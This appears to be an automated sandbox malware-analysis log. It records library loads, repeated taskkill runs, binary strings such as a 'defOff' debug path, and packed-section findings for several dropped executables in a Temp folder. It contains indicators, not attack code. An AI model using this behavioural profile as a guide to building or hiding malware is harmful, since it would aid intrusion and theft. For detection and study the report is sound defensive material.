Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 2955264 > 1048576
Source: file.exe Static PE information: Raw size of iktxewek is bigger than: 0x100000 < 0x2a5e00
Source: Binary string: The name of the library's debug file. For example, 'xul.pdb source: firefox.exe, 0000002E.00000003.2993943486.0000020F30A48000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2998056944.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2996083751.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: "description": "The name of the library's debug file. For example, 'xul.pdb" source: firefox.exe, 0000002E.00000003.2993943486.0000020F30A48000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2998056944.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2996083751.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2992504945.0000020F3083B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Found range to be highlighted. Default highlights all ranges.An integer value of button by which menu item was clicked.Stops the profiler and discards any captured profile data.The name of the library's debug file. For example, 'xul.pdbCalled when websites' file systems have been cleared.Whether the new window should be an incognito window.Retrieves information about a single contextual identity.Information about the cookie that was set or removed. source: firefox.exe, 0000002E.00000003.2996083751.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: my_library.pdbU source: b76bb5cee7.exe, 0000000A.00000003.2721535335.00000000050CB000.00000004.00001000.00020000.00000000.sdmp, b76bb5cee7.exe, 0000000A.00000002.2766160676.0000000000ACC000.00000040.00000001.01000000.0000000F.sdmp, b76bb5cee7.exe, 0000001D.00000002.2961232929.0000000000ACC000.00000040.00000001.01000000.0000000F.sdmp, b76bb5cee7.exe, 0000001D.00000003.2862123172.000000000524B000.00000004.00001000.00020000.00000000.sdmp, num.exe, 0000001F.00000002.2875624155.00000000002CC000.00000008.00000001.01000000.00000018.sdmp, num.exe, 00000030.00000000.3003390032.00000000002CC000.00000008.00000001.01000000.00000018.sdmp, num[1].exe.5.dr, num.exe.5.dr
Source: Binary string: my_library.pdb source: b76bb5cee7.exe, 0000000A.00000003.2721535335.00000000050CB000.00000004.00001000.00020000.00000000.sdmp, b76bb5cee7.exe, 0000000A.00000002.2766160676.0000000000ACC000.00000040.00000001.01000000.0000000F.sdmp, b76bb5cee7.exe, 0000001D.00000002.2961232929.0000000000ACC000.00000040.00000001.01000000.0000000F.sdmp, b76bb5cee7.exe, 0000001D.00000003.2862123172.000000000524B000.00000004.00001000.00020000.00000000.sdmp, num.exe, 0000001F.00000002.2875624155.00000000002CC000.00000008.00000001.01000000.00000018.sdmp, num.exe, 00000030.00000000.3003390032.00000000002CC000.00000008.00000001.01000000.00000018.sdmp, num[1].exe.5.dr, num.exe.5.dr
Source: Binary string: A partial SuggestResult object, without the 'content' parameter.Found range to be highlighted. Default highlights all ranges.An integer value of button by which menu item was clicked.Stops the profiler and discards any captured profile data.The name of the library's debug file. For example, 'xul.pdbCalled when websites' file systems have been cleared.Whether the new window should be an incognito window.Retrieves information about a single contextual identity.Information about the cookie that was set or removed. source: firefox.exe, 0000002E.00000003.2993943486.0000020F30A48000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: YQEN9A9QU4P1VROBPV5YS.exe, 00000003.00000003.2350536379.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, YQEN9A9QU4P1VROBPV5YS.exe, 00000003.00000002.2483748959.0000000000592000.00000040.00000001.01000000.00000006.sdmp, U2242U1STHGPPKHG.exe, 0000001E.00000003.2873579535.00000000026E0000.00000004.00001000.00020000.00000000.sdmp, U2242U1STHGPPKHG.exe, 0000001E.00000002.3008298151.0000000000632000.00000040.00000001.01000000.00000017.sdmp
Source: Binary string: Found range to be highlighted. Default highlights all ranges.An integer value of button by which menu item was clicked.Stops the profiler and discards any captured profile data.The name of the library's debug file. For example, 'xul.pdb source: firefox.exe, 0000002E.00000003.2998056944.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Unpacked PE file: 3.2.YQEN9A9QU4P1VROBPV5YS.exe.590000.0.unpack :EW;.rsrc:W;.idata :W;itokqeos:EW;vqtnthmp:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Unpacked PE file: 4.2.99Q4Y3O9GBOXYTDVM9GPHI.exe.520000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qodksccb:EW;reojqbkz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qodksccb:EW;reojqbkz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Unpacked PE file: 10.2.b76bb5cee7.exe.aa0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fozyxqhw:EW;gnsdcfju:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fozyxqhw:EW;gnsdcfju:EW;.taggant:EW;
